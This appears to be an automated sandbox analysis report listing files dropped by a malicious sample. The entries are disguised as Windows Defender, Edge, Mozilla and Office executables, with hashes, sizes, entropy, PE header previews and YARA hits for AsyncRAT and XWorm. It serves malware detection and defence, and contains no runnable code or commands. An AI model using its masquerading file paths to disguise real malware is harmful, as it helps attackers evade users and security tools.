                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1640416
                                      Entropy (8bit):7.91251877420056
                                      Encrypted:false
                                      SSDEEP:24576:dwy53G70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUG:Cy53w24gQu3TPZ2psFkiSqwozX
                                      MD5:352C6224D8440DF99EC9BCB6D1205994
                                      SHA1:6E0D04A6F207B83B385F09F43E1C1AA4519399A6
                                      SHA-256:5F579E51C94992CFD86C111D09F84E328F373073903E51D7C02AC77697D682EF
                                      SHA-512:9175FB5E4524C95C706C4147B700155BD551842F2890D737C635DF8B684585AAFF2E41EC2B81BA0BA941ADCDB51BFA9DAE09C2440E4B5EAEA9524462F0ADF08A
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):144866
                                      Entropy (8bit):6.2324558335577
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCkRD5b0qZ7y4jem7y6tkNRCywDw1DiJkuKUY:PuGD5lZ7y4j9KT4DteUY
                                      MD5:D709786C68534D0465D77BDE302F7065
                                      SHA1:6E113BCB0876FDDDC39B31D1F364AC1C3B0F9B40
                                      SHA-256:8F98C63531C25555C4ED421DC87B670C763690A82E9B2D76A59D2233AC500636
                                      SHA-512:47295791D6181ABB9F777E85ADE7425A34C497A5E4E5B483104DE6105D9CE49D9FD7A342BE5B469528176DB4E63D0A5117F9E6C969B999B7F87FE1076DB14B86
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):280480
                                      Entropy (8bit):6.382752729567392
                                      Encrypted:false
                                      SSDEEP:6144:Pu6Pr2vXzrEbslNp/JNsJKQl0GkRAqVNf0O3:7DQXRVTZu0GP+ZR
                                      MD5:25156B6B2ACFE0D4284F3842C0F1FD9F
                                      SHA1:C3C3387E29A3C045104FBA65357B73D36CB72F96
                                      SHA-256:1F32EEC314E0AEE4B61FAEE41B8D2D882AA49E3D49906E2F91FD842C574D2E17
                                      SHA-512:77B19A7D771681CC8AF1456013761626620EBCA8B336BD728ACE88B67E7E8D20812918BB588B5D06EF1E722607442ACECAF0BCD2274C912520F3125517157ECC
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Java Update Checker (64 bit).exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):46592
                                      Entropy (8bit):5.848041824576861
                                      Encrypted:false
                                      SSDEEP:768:B68rPcT5+tkzOGvAX8WuFZ4hJF5PC9O9W68OMhl3/OV/8:08r8ItiOeW894Fc9UW68OM3eE
                                      MD5:9F4FFCEB9E7905107492815B7EBFDC13
                                      SHA1:417E66C983CE65D0588CAB57EBDAD317A9FEF818
                                      SHA-256:6FB45016BB75A9968AE3ADC15A03B8C2E94BD22342F306F1E52A03BF498D5AF9
                                      SHA-512:E724C98562C96CB5F8AEC64167DFC122FA005AF06D1A4A20DC58549D20966DA0B722D58C16330785B8AF2435A199436DD1723AECC21FA127A65B4A8F44452357
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\Java Update Checker (64 bit).exe, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Java Update Checker (64 bit).exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Java Update Checker (64 bit).exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Java Update Checker (64 bit).exe, Author: ditekSHen
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|f................................. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......|]..(Z............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                      C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4473576
                                      Entropy (8bit):6.5697251244545924
                                      Encrypted:false
                                      SSDEEP:98304:9kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:9kkCqaE68eV+0y8E6L1
                                      MD5:A0E84CEDA4163F189BE5349FD432B1CB
                                      SHA1:204335080CD8BA8D46E52DFB29F1461D7BF84CA1
                                      SHA-256:9A8C97840B4745ABA6BE44CAE7DE9EC0E7960AE31E52DFDE4ACCB1C24B6C4DA7
                                      SHA-512:BE941C507F9A607087E96CDBA94358F4882BA231CC08E6AAE8480301A5FF82940630134F9DB780B9527F43DD83ABE5D4868759854D2517A6D6A87A26903FCC9F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):501656
                                      Entropy (8bit):6.316687804131066
                                      Encrypted:false
                                      SSDEEP:12288:mLH18t6x1hjaNHBlfBVDZS82JninSFVlDW:mLOwxyNHBVEHRiSFVlDW
                                      MD5:EE696711CF9AC80FC9EFBB26B76ABCFE
                                      SHA1:A2E66B1A8970B93B055B783F1FE600A5EA861690
                                      SHA-256:9DA9F59CB0DF8F42679E524FDF590843F68D1413BB1F36335B361245F5FD7170
                                      SHA-512:5A6E226B94364E8F0312D8DE64192A5343EB5E370BC5E10F373458C871A25ABE7520E55AD68279FD215820CABEDADDE4ACA9A01071370B980B62A0126AAB2A94
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1637776
                                      Entropy (8bit):6.316076233282021
                                      Encrypted:false
                                      SSDEEP:24576:z7Z1jyzcKSmKsvwMZJ1XBsn/gu2bRC6dulyyn2WdXM6cWlLIJ:/Z1tKTwMZJ1XBsn/UC6dugWA
                                      MD5:2E0AE929AA0C46D1850BD2064954D911
                                      SHA1:C27307CF87ABAA9CB17C869583BEC5DBB57A3C41
                                      SHA-256:BB21F5661BC8569FBAD37E05E000529EA09A93DF9CE906AC798B6FF87C39DB52
                                      SHA-512:6F79861A391A35B7634EA05FD37B28ECEA234FE91AC44B3F2DD365F49C9338AA43D5EF40B80588343E7C1B05D2B358F9516F2696F6DB1E4D9D8EA87CBFADB1E1
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):224632
                                      Entropy (8bit):5.620193770987743
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCvFtCsHjgU7HOg6KTe/+EypudsD22QnSUEhydebz41:Pu9tx0SA+EySaQKeUz41
                                      MD5:96A64BD0E265640FFAFD214049708702
                                      SHA1:DA525339352A6F40A51DD61FE17149EC37E69C61
                                      SHA-256:4E88BCEBE61AFD28AD1EC55523F1656CA98F02806531CEFFCA55F2598674CFFA
                                      SHA-512:EA63C18E5AB547A7F76C6BD2F721296B400E2D6FE89C45DFD8DFAB86A794D171A44487CAB0C8DC2328F9DC92C239BB1E2BF55D7C903791EF341BD88FEAE28FB0
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):431336
                                      Entropy (8bit):5.901379876199201
                                      Encrypted:false
                                      SSDEEP:6144:PuYzBRUKCBTwZVr2miTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVV+:jzBRnCBOrsBOBf
                                      MD5:E7C3CF515AE2F8559EB6E76D748D667F
                                      SHA1:265615DC51ACBDE842A9A012D03732AA4BF9DDE9
                                      SHA-256:A2CAC1656374C752299952716F9021B3E15497166FA936A1BAD6AB7C39FE7F8A
                                      SHA-512:9034265306CF0A5D467C652FEAE1AD6FB4798B527A8C58EED576137582EBF6F24DD25D9EC9D977C93A489E749F1F1A20503B508C168CC9C54419AEDA9B044458
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):175160
                                      Entropy (8bit):5.99132731187077
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC2/VpSIcnsHKTe8LnZCA5OfkQAm95kQOJeqx6u:Pu2tkIpdA5OfzDUeqx6u
                                      MD5:C41D1423579C9814533D2E30DA685786
                                      SHA1:B8AE1B9A8EA125CFA003E1404F44F825F3EFA4AE
                                      SHA-256:BEE3417F4A10BA18D5DDF56EF7D3AF8597164CE62C74D4E979E09BAD6C7D6509
                                      SHA-512:52DC28327704F55153CB10ADB7686D5469698D07ECF6E03B223F8DE2C32DF5296BA7E0190E37A58ECCA264C1B045CF7CA1F2AE35F15BA4F43B51D92961F7F90E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3162480
                                      Entropy (8bit):6.468488558909844
                                      Encrypted:false
                                      SSDEEP:49152:vnW4jqFRZega3xejvY7GQOx4K1fm15FKqO7t78Ity6fod76lmlW8U:ms3OBj4UmOH
                                      MD5:3A5E520F6C98AFDEA3D5D2D92483C739
                                      SHA1:A578D0612B92D4E3D3C913B06BE977EDFA7ACC20
                                      SHA-256:BE77D2388C60AB0610D2B49BF1883F24B40C33C767160FBF178F2EF3EA3834AE
                                      SHA-512:A3451E0C8CAF184343F68D29406D95BFBDE38F03C8AD0FFC4EDED0B3F4942ACE98D17189C574364730A7BF0F249808371175063312A00F9D85EABB61A5657673
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1309408
                                      Entropy (8bit):6.49550103750245
                                      Encrypted:false
                                      SSDEEP:24576:9+sGOL9NLM3r4Viwj6KLqGua43loEeUFmwv:94AA4eGua43lgUFrv
                                      MD5:EAD6386843778A730062C698AA030740
                                      SHA1:F24C8F0717004F67681BC64DACD4187A98D596B2
                                      SHA-256:D932B4622D4D9A52924CB1540B483EF7163D67263A0E0EBA11504B73295B8D80
                                      SHA-512:0E7641E940526213DFD1627CC80852FE8DC6D9ED3582E30FF355DD56978794B850081082FE7B798152D8AE0E437212471C3C615714FF9CE1DC87434235716516
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):922944
                                      Entropy (8bit):6.460885615415187
                                      Encrypted:false
                                      SSDEEP:12288:R9/Bro8OEYbhEdbsrg4Sxz2/Sl92ncG15fQ224i5pQ+poPCcqyt4:n/BrnYuqFcL3pQ+pDX
                                      MD5:F0BF9ADF513239520A14EB785BDD5886
                                      SHA1:F1915F5400458CA477B5E90DE9A2C5C4DDC132CB
                                      SHA-256:AC67389D5DA5FC3A99576D5832BEC09D66B41E751A15B1B53349A3003EF14DFE
                                      SHA-512:13CC35E7344418CF48E95525F351585652B9A499FF674DE766AED5D7B35F93F60FA9639AF011E0FCEB5F63AD895EDDBE0054EFE98922811BBE6206E52197AF82
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):501544
                                      Entropy (8bit):6.316070563003216
                                      Encrypted:false
                                      SSDEEP:12288:mLH18t6x1hjaNHBlfBVDZS82Jn8YSFVhwDW:mLOwxyNHBVEHR8xFVhwDW
                                      MD5:E7018A93116CD346F9F8A0CC2243295E
                                      SHA1:89155DDC39A59182E5CD870C4D16688AEB2E30FC
                                      SHA-256:A09544750353F4CD7DE1630460B6CD65F42524A51886FFA20857A220C5190211
                                      SHA-512:61428F7197B96297E15074C88F214D5247ED06BC5787A1403A87AAA479D6DDD860BC2FAFA8FF95DAD863632A898315313D353C9147118A7BE2E11ECFD21AF788
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1637776
                                      Entropy (8bit):6.316140077808731
                                      Encrypted:false
                                      SSDEEP:24576:zzZzKrsdCmasrf9Xr5wzW27+w3E4nZ1jDkCZTunfmrd/Mq8pqiV+yeci+HMJ:HZ5d3f9Xr5wzW2x3E4vDkCZTEJ+3
                                      MD5:5D2BD0DA80A8E62789209A0EDAB83B1D
                                      SHA1:757F87BD301AA6F57CE838BE3153B8830921B501
                                      SHA-256:EAB3120F77B545B22123182F21EC23BEDE944108CC3C684E7BD282F7049B5535
                                      SHA-512:FE38763D90349CD0A6816E1EF7B49B6FDA6D7ED3102960F2033FD9FB24EA22FE28B49C0638D971B673D6E24C81FC03D7A414530007F68D005454C645E06F1898
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):224632
                                      Entropy (8bit):5.619874211696376
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCrNzQsUdR7ROPHKTeA+EyBEBsLj6mCv0MC+8w+l+jDYgb:PupzrUdH7+Ey6yxCyncDYgb
                                      MD5:C13590C04F1E3D09263F396F200D3452
                                      SHA1:3DFBDA0E787B01FA3F39AA2852C2EFAA2BBE9DD7
                                      SHA-256:F1D24A7B92913E56B479B077CA38CF87F4153D9154AF1FFC1B27F2DC03C3408A
                                      SHA-512:8A32E90E9C1C3C326EB225B63FE0D2FABC7E4E2C7ADF8367E4016180D004F7DAFFF0ED24FC398F04CBF95EF6DB4F8F87F4AD21F76141AD2BF8351F4C11AD04B5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1922888
                                      Entropy (8bit):6.541750856572876
                                      Encrypted:false
                                      SSDEEP:49152:BxzduwxBjJMXDUlxqK/PDLWf+kfilcOk+4AgAQx:9uADax
                                      MD5:49F38F9FA23BAA8E1B8F5FF1B370B96B
                                      SHA1:B1B947630361E3C9B0B9CD17A2E95BF193EA427A
                                      SHA-256:1A36E884AA4A5DD09F648BB3DE9F89206DCFFF49A37B1164E5F5477F1FA24D79
                                      SHA-512:20DFF8A6AF31281E0F566CE03A60BECB36C99AF79493C0B06FC12C34003B00238990971E8E2D840554D96BD69A23B1BF506AFDA46B71D2908E75B640D574624C
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):431256
                                      Entropy (8bit):5.900901024115435
                                      Encrypted:false
                                      SSDEEP:6144:Pu4DBRMKC2DARcy85smiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVL3:zDBRPC23DWqOhf
                                      MD5:165B08FB9A429B745E9E168D329EB478
                                      SHA1:AC79D629D68A6177ADB43161D3731AF138802511
                                      SHA-256:3CB517BD21BD184AEA460E8925C81B16A8D6DD26D394AD9123F8C2AD943E6E8B
                                      SHA-512:F740313E067A29A4DFC358AA960B8E73AE350CA3F34FB851209E3505E49349B0A736BA0C5015CE6494DB43021B9A118CBD3BE3E467642F1F7AFD47EC0DF85519
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):175056
                                      Entropy (8bit):5.99353613364511
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCVBGrjhgGcKTeA4yJjAYykykBdg+FoQOJb/B1a:PuVgfhFAYykySfUb/B1a
                                      MD5:12C030EA2C1A9660563DEE8B7A25B079
                                      SHA1:A6FDE7087411C992CDE0D4E87E622C0C3A015527
                                      SHA-256:1F140237E5B5DAB4789F967B50E6994E1D9307B25ACB2E521CB72692B0EA44C7
                                      SHA-512:A39A033F4756D8068F60568BCADB9BE8A0AE8593A44AD72BDD069DEA4280C137FFD78D0CE04B359409EA3EA8FF5A6E8B5A56032D7952FBEF35FB95BCE556C5EA
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3158376
                                      Entropy (8bit):6.463770375021316
                                      Encrypted:false
                                      SSDEEP:49152:M7Inw/bT9uzlAndnpufoDbRwU/xv3lNOsWReEQZeEO1QOiPQOo4r+U:I/VmUAYrj
                                      MD5:F747D7C1167AE52C17B8EE2B2B648F50
                                      SHA1:7F99741F5EE38CEB68388AD913638C34AD9BDD81
                                      SHA-256:BDF99F70C03F23725102CB413F9069900350E5911F4566CFB5447284D4B28256
                                      SHA-512:A983A8C9114BFB32DCB2E42CF907EABC41B7DDF335B661F1BBCFA35C59CB238A2C0B1864F95F76B781BAD0198F82E0E25BC3754D8AA349AAF999FA70501413B3
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1309536
                                      Entropy (8bit):6.494467247437919
                                      Encrypted:false
                                      SSDEEP:24576:/vbIUnHtg+i54V0tqDNbu5kDIPQy+NTD4XnFzr:/zXzdMkDIPQy+Nv4Vr
                                      MD5:2E10137A170646449F276989631090FB
                                      SHA1:809AB6D6099509DF331284F36A8B8AD463C3A9D2
                                      SHA-256:7B9223995309B804C92D3244ACB070FC23B4A6FCAFFAD882CF7EA87C451C2A50
                                      SHA-512:C6F93A90B753C9FC3CE8655A95C358A2892AE8CFC11E615B9443F1317D3FE5699E98A752B100AF12A253064DC4F0E7DB570B06D86DEE4374422DB8C9C0117A6A
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):922960
                                      Entropy (8bit):6.460975970387529
                                      Encrypted:false
                                      SSDEEP:12288:R9/Bro8OEYbhEdbsrg4Sxz2/Sl92ncG15fQ224i5pQ+pouCcqC7D4:n/BrnYuqFcL3pQ+pYmE
                                      MD5:8620D3407D835BF915F0FFF81B796100
                                      SHA1:BECA62BD742B85C5DAE7E40C12E224540FE5D527
                                      SHA-256:FC8B94FB0206DE6668B6F6711EFAF59F21E5814AAD2D097729AB830929310383
                                      SHA-512:BC5AD43D7A563BCA425B22A199F49F9C2D1851FEAFACB7C74AECDB11845C0D24BA0B511D63A56E3B7CD3ADF81965FA70340B3DBAF8DAEE66A23DEADDBF218A86
                                      Malicious:true
